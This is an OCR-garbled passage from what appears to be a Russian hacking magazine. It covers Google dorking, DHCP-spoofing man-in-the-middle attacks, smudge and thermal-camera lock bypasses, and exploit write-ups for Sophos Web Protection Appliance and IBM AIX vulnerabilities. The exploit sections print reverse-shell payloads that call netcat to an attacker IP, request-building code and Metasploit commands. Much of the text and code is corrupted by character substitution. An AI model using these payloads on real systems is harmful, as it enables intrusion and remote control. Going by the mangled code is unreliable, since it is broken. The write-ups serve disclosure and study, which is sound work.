можно получить доступ через специальный АРІ. Здесь как раз автоматиче- 
ски можно получать инфу без проблем (капчи). Но есть другое ограниче- 
ние — разрешено делать не более 100 запросов в день. Больше — платно 
(1000 запросов — 5 долларов, для примера). И вроде бы больше 100 ответов 
не получить. В зависимости от типа задачи (глубина или покрытие) можно 
выбрать один из вариантов соответственно. 

Но для пентестерских задач могу порекомендовать такую тулзу, 
как ЗеагсітОіддііу. Я уже частично ее описывал, в контексте поиска багов во 
флеше. Здесь же мы коснемся других ее возможностей — гуглохакинга. 

Она проста в использовании, написана на С# и работает только под ѵѵіл, 
может работать как напрямую с гуглом, так и через АРІ. В ней нативно пред- 
ставлена большая база различных гуглодорков (оооочень большая), а также 
имеется удобная возможность сортировки и выгрузки результатов в раз- 
личные форматы. То есть то, что нужно :), Итак, немного пробегусь по ин- 
терфейсу. 

Оиегіез — как раз набор различных гуглодорков. Все разгруппировано 
и вполне понятно. Ставим галки где нужно, и он ищет по ним. 

Далее Зеіііпдз. Можно выбрать методы получения инфы. Если галка 
йІзаЫе зсгарег не стоит, то данные будут получаться эмуляцией гугления (не 
через АРІ). Для этого метода рекомендую сразу добавить перечень ргоху 
в соответствующей вкладке, а то слишком быстро заблочат. Если стоит гал- 
ка, то используется АРІ СоодГа. Немного подробнее об этом. 

Для того чтобы получить доступ к этому функционалу, тебе нужны Соодіе 
Сизіот ЗеагсЬ Ю и АРІ кеу. 



1. Заходим на Шрз;// 1 



іЛА 



ас 



сот/сзе/ап и создаем там новый по- 



исковик. С настройками можно сильно не запариваться. В поле Зііез іо 
зеагсб можно добавить любое название. Это поле важно, только если 
ты делаешь поиск по своему настоящему сайту (типа поиск для конкрет- 
ного сайта). Для наших же целей, когда мы хотим искать много где, оно 
уже не важно. Потом заходим в настройки движка (есііі зеагсН епдіпе). 
Главное для нас здесь две вещи. Во-первых, в настройках движка устано- 
вить для поля Зііез іо зеагсіі значение ЗеагсЬ ібе епііге ѵѵеЬ Ъиі етрбазіге 
іпсіибесі зііез. Так гугл будет искать по всем сайтам, а не только по нашим 
(потому и все равно введенное нами имя). Во-вторых, берем значение 
из Зеагсб Епдіпе Ю — это, как ты понял, идентификатор нашего кастом- 
ного поисковика. То есть полдела сделано. 

2. Заходим на бі1рз://сосІе.аооаІе.сот /аріз/сопзоІе . Здесь нам нужно 
подключить сервис Сизіот Зеагсб АРІ во вкладке Зегѵісез соответствен- 
но. А также получить свой личный АРІ кеу во вкладке АРІ Ассезз. 



Все, теперь можно ввести оба этих значения в настройках ЗеагсИйіддііу. 

Следующий важный пункт — Зііез, Эотатз, ІР гапдез. В нем как раз 
очень просто ограничить поиск для гуглодорканья. По сути, используется 
параметр зііе: от гугла. Так что можно сразу указать набор доменов, где хо- 
чешь совершать поиск, — очень удобно. 

Последнее — Оиегу аррепбег, позволяет нам задать дополнительные 
строки при поиске, то есть прямо в него можно пихать гуглодорки. 

Вот, в общем-то, и все. Получается очень удобно. Еще хотелось бы от- 
метить две фичи. Первая состоит в том, что в настройках можно увеличить 
количество значений в ответе на запрос (Орііопз-Зеіііпдз-Соодіе) до 100. 
И вторая — можно отредактировать файл в поле Оеіаиіі Оиегу Оеііпіііоп. 
В нем хранится база гуглодорков. Так что можно сделать свой личный набор 
и оперативно использовать его впоследствии. 
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Приличный список хостов с Зігиізсіеѵтосіе = ігие 



ОРГАНИЗОВАТЬ МІТМ ЧЕРЕЗ ОНСР 



РЕШЕНИЕ 

За последние пару-тройку лет здесь, в Еазу Наск, были описаны, наверное, 
почти все возможные тап-іп-іНе-тісІсІІе атаки. Во всяком случае, после дан- 
ной атаки мой список закончится :). 

Итак, задачка, как всегда: мы в одной сети с жертвой и хотим, чтобы ее 
трафик ходил через нас. Один из вариантов — использовать поддельный 
ОНСР-сервер, Про саму технологию всезнающая вики говорит следующее. 
«Оупапліс Нозі Сопіідигаііоп РгоіосоІ — протокол динамической настройки 
узла — сетевой протокол, позволяющий компьютерам автоматически полу- 
чать ІР-адрес и другие параметры, необходимые для работы в сети ТСР/ІР. 
Данный протокол работает по модели „клиент-сервер 1 '». 

Как только хост подключается к сети, его операционная система посыла- 
ет в сеть широковещательный запрос для того, чтобы найти ОНСР-сервер. 
Тот в случае получения запроса ответит предложением с каким-то свобод- 
ным ІР-адресом, а также дополнительной информацией (ІР даіеѵѵау и 0145- 
серверов, маска сети, вроде бы еще может быть информация по прокси). 
Потом идет подтверждение, когда хост отправляет, что «согласен», а сервер 
отвечает: «ну и хорошо». Порт для ОНСР используется 67 ІЮР. В запросе 
есть четырехбайтный случайный идентификатор и МАС-адрес клиента. 



В общем-то, это все, что нам нужно знать для атаки. Как видишь, клиент 
пытается найти ОНСР-сервер, используя широковещательный запрос (со 
всей вкусной инфой о себе), а возможности подтвердить, что сервер — это 
настоящий сервер, нет. 

Отсюда вывод: все, что нам необходимо сделать, — это поднять свой 
ОНСР-сервер и ждать клиентов. Тут есть небольшой элемент рулетки, так 
как получается некий гаізе сопбіііоп. Официальный сервер и наш, получив 
широковещательный запрос, ответят на него, но только первый из ответов 
будет обработан клиентом. Но если наш хост будет находиться «ближе» 
к жертве (меньшее количество хопов), то шансы наши конкретно возрас- 
тают. 

С практической точки зрения можно воспользоваться для атаки либо мо- 
дулем Меіазріоіі’а бМср (аихіііагу/зегѵег/сіііср), либо Еііегсар. Второй метод 
более удобен, так как тулза берет на себя все для реализации самого пере- 
хвата данных. 

Для атаки нужно выбрать МІТМ — ЭНСР зрооііпд и указать диапазон ІР, 
маску подсети и ЭЫЗ-сервера (можно повторить данные от официального 
ЭНСР-сервера). А ІР нашего хоста будет автоматом подставлен как даіеѵѵау. 
Пара кликов — и все, мы посередине. 
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ОБОЙТИ ГРАФИЧЕСКИЙ КЛЮЧ 



РЕШЕНИЕ 

Давай отойдем от привычных внутренних вещей и поговорим о чем-то более 
неформальном и «живом», что ли, — о физической безопасности. Вообще, 
многие хакеры интересуются этими вопросами. Взлом замков (Іоск ріскіпд) — 
тому подтверждение. Мне лично кажется иногда, что это такая «профдефор- 
мация». Появляется желание все ломать. А ломание чего-то физического — 
тот еще фан :). Но это так, вступление к последующим двум вопросам. 

Раньше (да и сейчас) считалось, что при возможности физического досту- 
па к компу уже ничто не спасет (шифрование и аналогичные меры не в счет). 
Та же МісгозоТі не считает багу за багу, если для ее эксплуатации нужен фи- 
зический доступ. 

Да, исходя из этого, ОС на компах, по сути, не сильно защищены. Но ком- 
пы стационарны, и защищать их несложно, а вот современные мобильники/ 
смартфоны, которые содержат много критичной инфы, часто теряются, да 
и украсть их просто. А потому безопасности физической и доступу в инфор- 
мации в них уделяется приличное внимание. 

Одним из методов защиты под АпбгоісІ служит графический ключ. Девять 
точек, которые необходимо соединить в определенной последовательно- 
сти. Всем понятно, что это не самая секьюрная штука, но все же и ее тоже 
интересно поломать :). По этому поводу есть ряд интересных исследований. 
Одно из них, очень угарное, — получение графического ключа с девайса с 
помощью анализа жировых следов, оставляемых от тыканья пальцами. По- 
смотреть фоточки и почитать подробно можно тут: аоо.аІ/ЗКѴгСК . Я лишь 
расскажу основные аспекты из работы. 

Для начала, я думаю, понятно, что, когда мы тыкаем экран пальцем, 
на экране остаются жировые пятна. Когда проводим графический ключ —мы 
оставляем целый жировой след. «Заполучив» этот след, злой дядя может 
за две попытки ключ подобрать. Сначала попробовать его в одном направле- 
нии, потом — в другом. И даже если там будет не весь «трек», а только часть 



его, то с учетом особенностей человеков и того, как они придумывают свои 
графические ключи (чтобы их еще было удобно использовать), ключ подби- 
рается за считан ые попытки. 

Съем же трека тоже дело простое. Нам потребуется источник света и твой 
глаз либо фотик. За счет того, как преломляется/отражается/рассеивается 
свет от чистой и грязной поверхности, мы можем различить сам трек. 8 этом 
исследовании народ запарился и провел изыскания — а под каким же углом 
лучше всего видно. После многочисленных экспериментов с различными мо- 
делями и углами пришли к выводу, что это 60 и 45 градусов (упертые парни). 
Кроме того, еще они провели ряд экспериментов (см. фотки в работе), в ко- 
торой показали, что, сделав фото поверхности телефона, на которой плохо 
виден след, и обработав фотографию за счет контрастности и яркости, можно 
различить след. 

Также интересной особенностью является м ногослой ность жировых 
следов (вот честно, не знаю об этом ничего). Оставляешь след от ключа, на- 
пример, а потом тыкаешь экран, и даже если весь затыкать, то старые следы 
почти не сотрутся. Под различными углами их можно четко различить. Магия! 
Кроме того, были проведены опыты, когда телефон пихали в карман и дви- 
гали в нем, и все равно след от ключа оставался. Таким образом, можно за- 
ключить, что если не чистить экранчик насильно, то графический ключ можно 
«слить» почти стопроцентно. Я думаю, пока народ исследовал эту тему, они 
отлично повеселились, да и получился крутой тру-хак! 

Между прочим, не стоит воспринимать данную работу совсем уж фано- 
вой. Если трансплантировать опыт с андроидовских ключей на что-нибудь 
более критичное, то и итог может быть серьезен. Тачскрины сейчас внедряют 
повсеместно, а потому и жировые пятна наши пальцы оставляют все чаще. 
И чем не метод, например, для получения РІЫ-кода с банкомата. Сделал фото 
под определенным углом и узнал, из каких цифр состоит РІЫ предыдущего 
пользователя. Ну, это так... давай мыслить шире :). 



ОБОЙТИ «КНОПОЧНЫЙ» ЗАМОК 



РЕШЕНИЕ 

О, а этот метод на самом деле безумен! Я прочитал его у одного очень извест- 
ного парня — Михала Залевски. В своем блоге еще в 2005 году он поделился 
этой интересной находкой. 

Итак, что мы имеем. Представь, что есть какой-то кнопочный кодовый за- 
мок. Например, на сейфе :). Задача получается перед нами серьезная и непо- 
нятная для взлома. Конечно, можно вспомнить школьные методы. Кнопочки, 
которые используются чаще всего, будут либо легче нажиматься (механиче- 
ски), либо иметь внешние затертости. Для входа в парадное, они, конечно, 
работали, но вот с чем-то более серьезным вряд ли прокатит. 

К тому же подходить и анализировать кнопки, а также кликать и пробовать 
варианты — это все повышает шансы быть замеченным. 

Что же делать? Михал предложил сногсшибательное решение. Восполь- 
зоваться специальным девайсом — инфракрасной камерой. Точнее, даже 
термокамерой (не знаю, как оно корректно по-русски, но ты понял), то есть 
камерой, которая «видит» теплоту предметов. Нужна с хорошей чувствитель- 
ностью. Михал писал, что такую можно купить за 5-10 тысяч зеленых :). 



Суть же атаки в следующем. Ждем, пока кто-то воспользуется сейфом, 
введет правильный код и уйдет. А дальше мы смотрим через камеру и видим, 
что те кнопки, которые были нажаты, имеют большую «теплость». Причем 
кнопки, которые были нажаты раньше, будут холоднее. Таким образом очень 
просто мы получим необходимую кодовую последовательность. 

Как отмечает автор, самая главная фича метода в том, что даже за те доли 
секунды, пока происходит нажатие кнопки, ей передается от человеческого 
тела достаточно тепла, чтобы быть «замеченным» камерой. В определенных 
ситуациях можно так же отследить кнопки, даже нажатые в перчатках. Причем 
кнопки рассеивают это тепло достаточно медленно. Примерно 5-10 минут! 
Добавь к тому же, что девайсы эти могли работать на расстоянии от 1 до 10 
метров (может, сейчас они стали еще круче?). В общем, атака из набора 
настоящего агента 007. Голова идет кругом! Подробнее читай тут: доо. сі/ 

ѵл/П П I М ГП 

ѴѴ ІИІ I I I I I ■ 

Надеюсь, прочтенное наполнило тебя энтузиазмом и жаждой жизни, так 
что если есть желание поресерчить — пиши на ящик. Всегда рад :). 

И успешных познаний нового! ЛЕ 




$П.ІК -И 22.0 

32 





Похоже, что это рука самого Михала (!!!) вводит пин Так видит инфракрасная камера 

1-5-9 



Камера автоматом поднастраивается, и мы видим 
введенный пин 1 -5-9 
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ІѴАІШШС 

Вся информация предо- 
ставлена исключительно 
в ознакомительных целях. 

Ни редакция, ни автор не несут 
ответственности за любой воз- 
можный вред, причиненный 
материалами данной статьи . 
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Увы, этот выпуск пройдет 
без уязвимостей в полюбив- 
шейся Цаѵа, да и счетчик на 
сайте іаѵа-ОсІау.сот показывал 
70 дней на момент написания 
статьи. Зато мы рассмотрим 
уязвимости типа инъекции ис- 
полняемых команд в различных 
продуктах и как можно написать 
эксплойт под них на основе 
лишь одного патча. 







ЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 



ИНЪЕКЦИЯ ИСПОЛНЯЕМЫХ КОМАНД 
В ЗОРНОЗ ѴѴЕВ РКОТЕСТІОЯ АРРИДЫСЕ 

СѴ55ѵ2: 10.0 { АѴ: 1_/АС : І_/Аи : N/0 : С/І : С/А: С) 

Дата релиза: 6 сентября 2013 года 
Автор: Ргапсізсо Раісоп 
СѴЕ: 2013-4983 

Сегодня мы разберем несколько уязвимостей в продукте от компании 
ЗорНоз — ѴѴеЬ Ргоіесбоп Аррііапсе. Как видно из названия, это веб-файрвол. 
И, как заявляют авторы, он предназначен для защиты не только веб- 
приложений, но и самого сервера. Напомню, что в начале года уже были най- 
дены уязвимости в этом продукте (СѴЕ-2013-2641 — СѴЕ-2013-2643), они по- 
зволяли выполнить произвольные команды на атакуемой системе. 

Неавторизованные пользователи могут получить доступ к файлу /орі:/иі/ 
арасИе/ЫісІосБ/епсІ-изег/іпсІех. рИр, обратившись по адресу НИрз : //<ЫРА_ 
5егѵег>/епсІ-и5ег/іпсІех . рбр. Также возможно обратиться напрямую через 
И1:^р://<ЫРА_5егѵег>/іпсІех, рИр, если в конфигурационном файле АрасНе 
НііѣрсІ . сопіР для виртуального хоста на порту 80 переменная Роситеп-ЬКосП: 
установлена как /орѣ/иі/арасИе/ІтЫосз/епсІ-изег/. Функция гип() в этом 
скрипте получает требуемый контроллер через переменную из (ЗЕТ -запроса 



и вызывает соответствующий обработчик. Доступные обработчики объявле- 
ны в файле /оріі/иі/арасРіе/ІтІісІосз/сопІіё/ІізпЗіІіеЯоы. рНр: 

сіазз ІІзгЗіІіеЛоы ехіепсіз АЬзІігасІіБіІіерІоы { 
риЫіс ТилсТіоп сопзІгисІі О { 

$1:ІпІ5->Яоы = аггау( 

"іпсіех" => "изгВІоскесДрПр", 

"ЫрскесІ" => "УзгВІоскесі.рНр" , 

"іпѵаіісі сег1:і1іса1:е" => "ЦзгВІоскесІ.рНр". 

" Г55 " => "ЫЗГКБЗ.рНр" , 

).; 

} 

І 

Это означает, что, например, когда будет запрошен адрес ІтЫірз : //<ЫРА_ 
5егѵег>/епсІ-и5ег/іпсІех . рбр?с=Ыоскес1 1 то для рендера страницы будет вы- 
зван скрипт ііБгВІоскесі . рЬр. В свою очередь, если мы посмотрим код скрип- 
та /ор1:/иі/арасНе/Іі1:сІос5/соп1:го11ег5/и5гВ1оскесІ . рНр: 



ІТ(І55е'Р($_СЕТ ' асіііоп ' ()) { 
іТ($_0ЕТ ’ асіііоп ' ( -- ' сопіііпие 1 ) { 
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$_иг1 = Ьазеб4_сІесосІе($_Р05Т[ ' ипі ' ] ) ; 
$5сЬете = рагБе^гІСІигІ^РНР^К^ЗСНЕМЕ ) ; 



іі_($5сИетѳ == "Ыгѣрз" && $1гИІ5->согѵЯ^->геасіС ’ы5а ргохѵ.<-< 
1і1:1;р5_5сап_1) != Іуез/ ) { 

$Ьо5ѣ = раг5е_иг1($иг1 , РНР_ІІКІ_Н05Т)^ 

$аг&5[ 1 игі' ] = $5сИете . . $Ьоз1:; 

} е1 5 е { 

$аг§5['иг1'] = $иг1; 

1 

ІТ($ Р05 Т* *аг%5 геазоп 1 ( == Чі 1 е ѣуремагп ' ^ { 

$кеу = $_Р05Т[ ' игі ’ ] ; 

Зраске г = ^/ор ѣ/ыБ/Ьіп/'РѣзЫізѣра ск 1 ; 

Іѵаіие = $ Р05Т[ Чііеѣѵ ре 1 ] ; 

} еІ5е і 

$кеу = $_Р05Т[ ' сіотаіп ' ] ; 

$раскег = 1 /орѣ/мз/Ьіп/зЬІізѣраск ' ; 

$саѣРаг1:5 = ехр1осІе(" | ",$_Р05Т[ г гаы_саѣе§огу_ісі ' ] ); 
$ѵа1ие = $саѣРагѣз[0] ; 

і 

І7(5ѣп1еп (ѣгіт($_Р05Т ' изег ' ()) > 0) 

$изе г - Ьазеб4_сІесос1е($_Р05 Т[ ' и зег_епсосІесІ 1 ] ^ 

е 1 5 е 

$изег = $_Р05Т[ ' сііепѣ-ір 1 ] ; 

іТ($и5ег == ' $изег - $_Р05Т[ ’ сііепѣ-ір 1 ] : 

$кеу = е5саре5Ие11агё($кеу) ; 

$изег = еБсарезЬеНап^^изег) ; 

$ѵа1ие = е5саре5.Не11аг§($ѵа1ие) ; 
зЬе11_ехес( "$раскег $кеу $изег $ѵа1ие"); 
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Рабочее окно программы ѴѴеЬ Ргоіесііоп Аррііапсе 



то увидим, что РегІ-скрипт /орѣ/мз/Ьіп/БЫіБ'Сраск будет выполнен, когда 
будут соблюдены следующие условия: 

* ѲЕТ-параметр асСіоп равен сопѣіпие или апсі; 

* РОЗТ-параметр аг§5_геа5оп установлен в любое значение, отличное 

от біеѣурешгп. 



неавторизованныи пользователь может выполнить произвольную команду 
в ОС с правами системного пользователя зріеіегтап. Единственное ограниче- 
ние — переданная переменная не должна содержать слово §оод!е. 

ЕХРЮІТ 

Для воспроизведения атаки достаточно скрипта на РуІТіоп: 



Переменные, что содержатся в запросе, контролируемом пользователем 
($кеу, $К 5 ег, $ѵа1ие}, проверяются с помощью функции е5саре5Ие11аг§( ) 
перед вызовом 5Ье11_ехес( ), из-за чего скрипт іізгВІоскесІ.рЬр не подвер- 
жен уязвимости типа инъекции произвольных выполняемых команд. 

Однако РегІ-скрипт /орѣ/мз/Ьіп/зЫІБѣраск становится сам уязвим 
к такому типу уязвимости, поскольку его функция §еТ_геТегегз( ) не про- 
веряет первый аргумент перед его использованием внутри строки. Из-за 
этого получаем возможность выполнить команду, используя обратные ка- 
вычки: 

зиЬ §е^_ге-Регег5 { 

ту $ботаіп = БЫТѢ; 

ІТ( ! --Р $геРегег_1із1:) { 

геѣигп (); 

} 

іі\($сіотаіп =~ / А §о о§1е\ . /) { 

$ботаіп = ' §оо§1е. сот ' ; 

1 

ту $оиѣри1: = /орѣ /мз/Ь іп/кѵ Іізѣд иегѵ $геТегег_1І5ѣ $сІотаіп; 

сЬотр $оиѣр и1: ; 



і-р($ои~Ьри1: /'(.*)'$/) { 

ту $5І1:е5 = $1; 
геііигп БрІіІіС ' \ | ' . $5і1:е5); 

} - 



} 

Так, установив значение параметра сіотаіп в РОЗТ-запросе: 

М:ѣр://ехатр1е. сот;/Ьіп/пс -с /Ып/ЬазЬ 192.168.1.100 4444 



рогі; = 443 

Ьосіѵ = , иг1=аНКѲсРоѵІЗсіЗсІу5Іе(зР1:с6х11іпМѵЬ0%ЗсІ% ЗсІ 1 

Ьосіу += , &аг§5_геа50п=5оте1:Іі1п§_сІі-| :: Тегеп1:_1:бап_61е1:уреыапп&^і__ 

61е1уре=сІигпгпу&и5ег=Ьи-Р-Ра1о ' 

Ьосіу += , &и5еп_епсосІесІ=ѴпѴт2тР5Ьы%ЗсІ%ЗсІ&сІотаіп=Ы:1:р%За%2-р%*- 1 

2-РехатрІе . сот%ЗЬ% 2 -РЬіп% 2 -Рпс% 20 -с% 20 % 2 -ЕЬіп% 2 -РЬа 5 Іі%*-і 
20192 .168.1. 100%204444 ' 

Ьосіу += ' &гаілі_са'Ье§опу_ісІ=опе%7с'Ьио%7сѣЬгее%7с-Роиг 1 

сопп = Ь'ЫірІіЬ . НТТР5Соппес'Ьіоп(Ьо5'Ь^ рогѣ) 

сопп . педиезѣ( ' РОЗ Т 1 ^ 1 / епсІ-и5ег/іпсІех . рЬр?с=ЫоскесІ8м-' 
асѣіоп^сопѣіпие ' ^ ЬосIу=ЬосIу^ ЬеасІег5=Ьеа сІег5) 

Как видно из скрипта, все довольно просто. Нам нужно сконструировать 
НТТР-пакет с нужной нам командой в параметре боплаіп, не забыв при этом 
про небольшое ограничение, описанное выше. Полную версию исходника 
эксплойта можно взять из статьи автора ( Ьіі:.Іу/1522[\!мП . 

Существует модуль для Меіазріоіб 

тзТ > иве ехр1оіѣ/1іпих/Ьѣѣр/50рЬо5_ыра_5Ь1І5ѣраск_ехес 
ехр1оіѣ^5ррЬо5_ыра_5Ь1І5ѣраск_ехес) > зеѣ гЬобѢ 192.168.88.1 
ехр1оі1:(50рЬо5_ыра_5Ь1і5ѣраск_ехес) > ехріоіѣ 

ТАВСЕТЗ 

• ЗорЬозѴѴеЬ Аррііапсе =< ѵЗ. 7.9; 

• ЗорЬозѴѴеЬ Аррііапсе ѵЗ. 8.0; 

• ЗорЬозѴѴеЬ Аррііапсе ѵЗ. 8.1. 

ЗОШТІОИ 

Есть исправление от производителя. 
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ЛОКАЛЬНОЕ ПОВЫШЕНИЕ ПРИВИЛЕГИИ 
В ЗОРНОЗ ѴѴЕВ РРОТЕСТІОИ АРРИАИСЕ 
СЬЕАРКЕУЗ.РЬ 

СѴ85ѵ2: 7.2 { АѴ: 1_/АС : 1_/Аи : N/0 : С/І : С/А: С ) 

Дата релиза: 6 сентября 2013 года 
Автор: Ргапсізсо Раісоп 
СѴЕ: 2013-4984 



позволяет нам эксплуатировать ошибку и получить права администратора 
внутри сервера. 

ЕХРІ.ОІТ 

В качестве эксплойта можно запустить следующий набор команд на взломан- 
ном сервере с ѴѴеЬ Ргоіесііоп Аррііапсе для повышения привилегий от поль- 
зователя зрісіегтап до администратора и получить обратный шелл с атакуе- 
мой машины на атакующий ІР-адрес, например 192.168.1 .100: 

$ зисіо /орі/ спі а/Ь іп/с 1еаг_ке у5 . рі -Раке сііе піі-Гдсі п ”:/Ьіп/пс 4-» 
-с /Ьіп/Ьа5б 192.168.1.100 5555;” /^акесііг 



Следующая уязвимость также была обнаружена в ЗорЬоз ѴѴеЬ Аррііапсе и по- 
зволяет повысить права доступа атакующего. Веб-сервер Арасбе и ЗорЬоз 
Аррііапсе запускаются с правами пользователя зрісіегтап. В свою очередь, 
в файле /еіс/зисіоегз определен список Ьазб- и РегІ-скриптов, которые 
пользователь зрісіегтап запускает одновременно с командой зисіо. Ниже 
представлен список самых интересных: 



Для этой уязвимости, помимо обычного эксплойта, также есть модуль 
для Меіазріоіі:: 

тз-Р > изе ехр1оі1:5/1іпих/1оса1/5орбо5_ілгра_с1еаг_кеу5 

гпБ-Р ехр1оі1:( зорбоз_іл/ра_с1еаг_кеуз ) > зеі ІЬозі 192.168.0.3 
тз-Р ехр1оіі( зорбоз_ѵфа_с1еаг_кеуз ) > гехріоіі 



зрісіегтап АІ_І_=М0РА55І/\Ю: /орі/5орбох/Ьіп/сопЬ§иге_іпіег-Расе, «-■ 

/орі/ 50 рбох/Ьіп/зорбох-ге&і$іег л <-■ 

/орі/ зорбох/Ьіп/зорбох-гетоіе-аззізІ: . <-■ 

■ ■ ■ 

/орі/ста/Ьіп/с1еаг_кеу5 . рі , «-> 



После анализа каждого из них был найден уязвимый /орі/ста/Ьіп/ 
с1еаг_кеуз .рі. В нем обнаружена уязвимость инъекции произвольной си- 
стемной команды, в функции с105е_соппесі:іоп5: 

зуЬ сі озе соппесіііо пз { 

ту ($с1іепі_ір., $зі§пит л $зі§пате) = 

ту (Эсоппесііопз = /Ьіп/пеізіаі: -пар 1§рер 

А і ср. * : 22. *$с1іеп1:_ір . *ЕЗТі 
-Гогеасб ( (ЭсоппесЫопз^ { 

Щ/Е5ТАВІ_І5НЕР\з*(\сі+)\/55бсІ/) { 

ту $сопп_ріс1 = $+;_ 

1о§_іп-Ро("соппес1:іоп РЮ: $сопп_рісІ; ту РІР: $$; е 

ту ргосезз ігее: " . іоіпС. (Й тѵ рг осеза і гее) ) ; 

. пехі і-Р (§гер {$_ == $сопп_рісі} @ту_ргосе55_1:гее).і 

. 1о§_іп-Ро("А1:1:етр1;іп§ іо зіор ргосезз '$сопп ріс Г <-> 

шііб $зі§пате"); 

кі 11 $зіёпіііП; $сопп_рісІ; 

1 

і 

} 



Как видишь, второй аргумент никак не проверяется перед использова- 
нием, что позволяет выполнить полученную строку как команду при помощи 
наших любимых обратных кавычек. Поскольку такая команда будет выпол- 
нена из-под пользователя зрісіегтап одновременно с командой зисіо, это 



ТАПСЕТЗ 

* Зорбоз ѴѴеЬ Аррііапсе =< ѵЗ. 7.9; 

* Зорбоз ѴѴеЬ Аррііапсе ѵЗ. 8.0; 

* Зорбоз ѴѴеЬ Аррііапсе ѵЗ. 8.1. 

ЗОІАІТІОЫ 

Есть исправление от производителя. 

ЛОКАЛЬНОЕ ПОВЫШЕНИЕ ПРИВИЛЕГИЙ 
В ІВМ АІХ 6.1 / 7.1 

СѴ53ѵ2: 7.2 (АѴ:Е/АС±/Аи:Ы/С:С/І:С/А:С) 

Дата релиза: 24 сентября 2013 года 
Автор: Кгізііап Егік Нѳгтапзѳп, ТМВ 
СѴЕ: 2013-4011 

В настоящий момент ІВМ АІХ является стандартной ОС для компьютеров 
с процессорами РОѴѴЕП и РоѵѵегРС семейств ІВМ В5/6000 (1990-2000), 
а также ІВМ рЗегіез (начиная с 2000 года), Зузіет Р и Роѵѵег Зузіетз (начиная 
с 2008 года). АІХ содержит ошибку, позволяющую получить повышенные при- 
вилегии. Проблема была обнаружена во время исполнения команды іЬзіаІ:, 
которая использует относительные пути при вызове системных утилит. Сей- 
час мы с тобой рассмотрим, как можно на основе даже бинарного патча найти 
такие команды, чтобы написать свой эксплойт. 

Для начала скачаем себе архив с исправлениями ( іЬпп.со/СгСЦгС ) 
для этой уязвимости. Внутри находятся сжатые еркд- файлы, выберем какой- 
нибудь один из них и распакуем: 

$ іаг хѵЕ іѵ4358Ѳт2а . 130619 . ерк^ 

х . /есРіІ е. 837 Ьуіез . 2 т есііа Ыоск5_. 
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Команды, которые были удалены из бинарника 
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опд С 


д соипі: 


211 ОоНсасЖ (Ьех) : %12ІІх 


217 /и 


зг/зЬ 


т/агр -1 ІЬ -а 



Команды, которые были добавлены из бинарника 
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х . /Е Р ИЕ1. 47516 Ь уЕез , 93 тесііа Ьіоскз. 
х ./ЕР ИЕ2, 17576 ЬуЕез . 35 тесііа Ыоска. 



В файле есбіе содержится список файлов, которые будут изменены: 

$ саі есбіе 

ЕРІХ_РИЕ: 

Е Р ІХ_ Р 1 1_ Е_ЩМ= 1 

ТАКСЕТ РІІ_Е=/и5г/5Ьіп/іЬ5І:а1: 

* • 4 

ЕРІХ_РИЕ: 

ЕРІХ_РІІЕ_ШМ=2 

ТАКСЕТ_РІІЕ=/іі5г/5Ьіп/агр..іЬ 



Вот мы и нашли два интересующих файла: 

• /изг/зЬіп/іЬзІаІ; 

• /изг/зЬіп/агр.іЬ. 

Один из них уже был заявлен в сообщении вендора об этой уязвимо- 
сти. Но как теперь узнать, что было в них изменено? Первое, что приходит 
на ум, — воспользоваться утилитой оЬісІитр для двух бинарников и сравнить 
вывод. Это позволит нам понять, что вызывает функция ІіЬс в результате ее 
выполнения и где находится уязвимость. Однако оЬ^сІитр собирает все сим- 
волы в один поток, из-за чего исследование превратится в длительный и уто- 
мительный процесс. Но так как мы знаем, что уязвимость связана с инъекци- 
ей произвольных команд, то можно с большой вероятностью ограничиться 
лишь поиском строк. 

Воспользуемся для этого стандартной утилитой 5ігіп§5: 

$ 5ІГІП85 /иБг/аЬіп/іЬзІіаі 

®(#)23 1.5 5Гс/Ьо5/и5г/сс5/1іЬ/1іЬрі:ЬгеасІ5/іпіі:.с. <-■ 

1 і Ьр- ЕИ. Ь0553Н . Н2ѲѲ6 10В1 3/5/06 21:33:24 . 

І-рСОПрІ§ %5 

4*4 



Далее сравним полученные выводы этой утилиты для нового и старого би- 
нарника. Для этого посмотрим на скриншоты. 

Отсюда следует, что уязвимый бинарник вызывает системные команды 
без указания полного пути к ним. Что нам это дает? До тех пор, пока бинар- 
ник іЬзіаі использует переменную среды РАТИ, все вызываемые бинарные 
файлы, такие как АВР и другие, будут им вызываться из первой найденной ди- 
ректории, определенной в РАТИ. Благодаря этому мы можем подкинуть наш 
собственный вредоносный бинарный файл в контролируемую директорию 
и выполнить его с правами администратора при вызове іЬзіаі {если он име- 
ет установленный $еШісІ-бит, конечно). 

Для проверки создадим у себя в домашней директории файл с именем 
і-Рсоп6§ и следующим содержимым: 

# ! /Ьі п/ 5 И 
есііо $0 
есИо $1 
есИо $2 
ісі 

аіеер 10ѲѲ 

В скрипте нет ничего криминального, он показывает поданные на вход 
переменные и идентификатор пользователя, с которым он запустился. По- 
сле этого добавим директорию, где хранится этот файл, в переменную РАТИ. 
В итоге получим примерно следующее: 

$ РАТН=/боте/и5ег/ІЬ5іаб/сіиттуЬіп г/изг/Ып :/е1:с : /иаг/зЬіп : /<-■ 
изг/исЬ 

Теперь запустим уязвимый бинарник: 

$ /и5г/5Ьіп/іЬ5І:а1: -а ІоѲ 



5 озіеѵеі 

б . 1 .0.0 

$ ./аІХ-Г001»5Й 



пп 

## 

# # 
#пп# 
# # 



пттпт 

# 

# 

# 

тп#пп 



# # 
## 
п" "п 
п" "п 



[*] АІХ гооі: ргіѵііеде &5саІаІ:іогі 

[*] КгІБІЛап Егік Негпап^еп 

[*] : //Ііпкесііп .соп/іп/кгІЕиапЬегріапБеп 



і і • * Г I 

* і * і Г і 

■ * ' ііі і * ■ і і 

717777 

П 1 Г I І I I • I I ] 

±±±77 777 77 7 

1 1 ' і I I I • I ■ I 

±±±±±777777 

++Ц.Ц.Ц.Ц.7???? 

-I — I — I — I — I — I — I — I- 7 7 7 

+-Н--Н--Н-Н-? ? 

++■ I— І--М-+-И-? ? 

-н-н-н-н-н- ? 

■ I I I 1 Т Т ■ I I | 

+-И-+--И-+-І-4-4- ? 



? ? і" 7 Т Т П " ■ * II > "I" ? I ? ? ? і ( [ ? ? ?^“ ^ 

? ? * і ■ I ■ і I ^ I I ?? ? І і ? ? ? ? ? "I" I I 

7 ^ ^ ^ ^ • ■ і ■ ■ ч »" 

7 7 " гь ™ _!*- ± X. ™ гъ 7 7 Г I ■ "7 |“ Г х_ 

II » I П 1 1 ' І I Е I I I I I I I П Г 



??, : =+-н-р-и-+=- 

7 4- л - - = 4- + +-І-М- = - 

-===-=+- 
1 Л 3 3 ш 



